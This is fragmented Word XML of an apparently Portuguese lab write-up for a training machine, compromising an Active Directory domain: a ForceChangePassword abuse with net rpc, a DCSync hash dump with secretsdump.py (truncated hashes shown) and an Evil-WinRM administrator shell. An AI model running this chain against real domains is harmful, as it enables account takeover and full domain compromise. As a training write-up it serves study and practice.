    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F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permissão ForceChangePassword permite que um usuário altere a senha de outro objeto no Active Directory sem precisar conhecer a senha atual. Essa permissão pode ser explorada para assumir o controle de contas, viabilizando movimentações laterais ou escalonamento de privilégios dentro do domínio.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base nas informações coletadas, foi possível utilizar a ferramenta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net rpc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para realizar a troca de senha da conta alvo, explorando a permissão </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ForceChangePassword</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> previamente identificada.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"diana.ops"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"newP@ssword2025"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"wcorp.dc"/"john.doe"%"PASSOWRD_HERE"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"172.16.11.181"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pr39t5orq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dos parâmetros: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password "diana.ops" "newP@ssword2025"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: define a nova senha </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newP@ssword2025</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">diana.ops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U "wcorp.dc"/"john.doe"%"Welcome01!"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: especifica as credenciais usadas para autenticação: domínio </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wcorp.dc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john.doe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e senha </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Welcome01!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 "172.16.11.181"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP do servidor (Domain Controller) onde o comando será executado.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Efetuado a troca da senha do usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">diana.ops</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> podemos efetuar a validação utilizando novamente o netexec.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diana.ops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'newP@ssword2025'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20348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(name:DC-01)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(domain:wcorp.hc)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(signing:True)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(SMBv1:False)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wcorp.hc\diana.ops:newP@ssword2025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Com a confirmação da alteração de senha, foi possível explorar a permissão </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DCSync</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> atribuída à conta, permitindo a extração dos hashes de todos os usuários do domínio por meio de replicação via protocolo MS-DRSR.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secretsdump.py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wcorp.hc/diana.ops:'newP@ssword2025'@172.16.11.181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v0.13.0.dev0+20250320.94448.5a402fcb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RemoteOperations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DCERPC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rpc_s_access_denied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Dumping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(domain\uid:rid:lmhash:nthash)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DRSUAPI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NTDS.DIT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Administrator:500:aad3b435b51404...:bca93a964...:::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Guest:501:aad3b435...:31d6cfe0d16ae931b...:::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krbtgt:502:aad3b435b51404eeaa...:cc714fd2703f917a...:::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wcorp.hc\john.doe:1103:aad3b435b51404eeaad3...:a59cc2e81b2835c6b402...:::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wcorp.hc\alice.hr:1104:aad3b435b51404eeaa...:e4a22d8e7bbec871b341...:::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wcorp.hc\bob.finance:1105:aad3b435b51404eeaad3b43...:e4a22d8e7bbec871b3...:::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wcorp.hc\charlie.dev:1106:aad3b435b51404eeaad...:e4a22d8e7bbec871b341...:::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wcorp.hc\diana.ops:1107:aad3b435b51404eea...:7e65f5b65d10011a6fed...:::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wcorp.hc\svc_backup:1108:aad3b435b51404ee...:22221aa9489a9fa9996434...:::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wcorp.hc\svc_web:1109:aad3b435b51404eeaad3b...:232a3f9ae310b3947...:::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DC-01$:1000:aad3b435b51404eeaad3b435b51404ee:12cf1d639f3f592bd106a7a4a1dc5c50:::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Kerberos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grabbed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Administrator:aes256-cts-hmac-sha1-96:8ee821d1e116cb434d8....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Administrator:aes128-cts-hmac-sha1-96:2adc5...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Administrator:des-cbc-md5:02a8fda77fa7f...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krbtgt:aes256-cts-hmac-sha1-96:f022ee99f8b87e4be388ad41...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krbtgt:aes128-cts-hmac-sha1-96:6018625e53c5d42d8...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krbtgt:des-cbc-md5:08a11cf83e07...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wcorp.hc\john.doe:aes256-cts-hmac-sha1-96:e7aeb26e...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wcorp.hc\john.doe:aes128-cts-hmac-sha1-96:dd9be64bbac17e....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wcorp.hc\john.doe:des-cbc-md5:0110bce6...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wcorp.hc\alice.hr:aes256-cts-hmac-sha1-96:f3a70e105d4de1799751...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wcorp.hc\alice.hr:aes128-cts-hmac-sha1-96:8a635d4b56fc7e34...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wcorp.hc\alice.hr:des-cbc-md5:b0abda1ad0...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wcorp.hc\bob.finance:aes256-cts-hmac-sha1-96:011cb74370b529...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wcorp.hc\bob.finance:aes128-cts-hmac-sha1-96:020dd777e41c92a...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wcorp.hc\bob.finance:des-cbc-md5:d60498679...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wcorp.hc\charlie.dev:aes256-cts-hmac-sha1-96:f765886fdfce6....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wcorp.hc\charlie.dev:aes128-cts-hmac-sha1-96:280d6d018....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wcorp.hc\charlie.dev:des-cbc-md5:40d949e3e....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wcorp.hc\diana.ops:aes256-cts-hmac-sha1-96:b2159459dee8f808316...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wcorp.hc\diana.ops:aes128-cts-hmac-sha1-96:ed9cb5260e2...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wcorp.hc\diana.ops:des-cbc-md5:a22502750e3...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wcorp.hc\svc_backup:aes256-cts-hmac-sha1-96:8d3fe9d6e96d1430d0b1...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wcorp.hc\svc_backup:aes128-cts-hmac-sha1-96:5da051c6ebbc951d1...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wcorp.hc\svc_backup:des-cbc-md5:6254046b6...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wcorp.hc\svc_web:aes256-cts-hmac-sha1-96:bf9c31ef9b07082d968...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wcorp.hc\svc_web:aes128-cts-hmac-sha1-96:55e0dfb6d8559e...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wcorp.hc\svc_web:des-cbc-md5:6e76ea0e....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DC-01$:aes256-cts-hmac-sha1-96:448eb11c780a8fed6835a239185f9...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DC-01$:aes128-cts-hmac-sha1-96:961e5ee206a35b4b....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DC-01$:des-cbc-md5:764ca8ea0b...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A permissão DCSync permite que um usuário simule o comportamento de um Domain Controller e solicite a replicação de dados do Active Directory, incluindo hashes de senha de todas as contas do domínio. Essa permissão é altamente sensível e, se mal utilizada, pode resultar no comprometimento total do ambiente.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Com todos os hashes do domínio extraídos, foi possível recuperar a senha do usuário Administrator. Utilizando essas credenciais válidas, foi estabelecida uma sessão interativa através do serviço WinRM, previamente identificado durante a fase de enumeração de portas e serviços.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172.16.11.181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bca93a...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quoting_detection_proc()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unimplemented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https://github.com/Hackplayers/evil-winrm#Remote-path-completion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*Evil-WinRM*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C:\Users\Administrator\Documents&gt;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wcorp\administrator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*Evil-WinRM*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C:\Users\Administrator\Documents&gt;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  <w:t xml:space="preserve">Tendo acesso com privilégios administrativos, podemos visualizar nossa última evidência dentro do diretório Desktop do usuário Administrator.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25400" l="25400" r="25400" t="254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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6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D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WCorp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header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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stringuetta/enumport" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast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hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast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app.hackingclub.com/training/training-machines/267" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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yperlink" Target="https://github.com/fstringuetta/enumpo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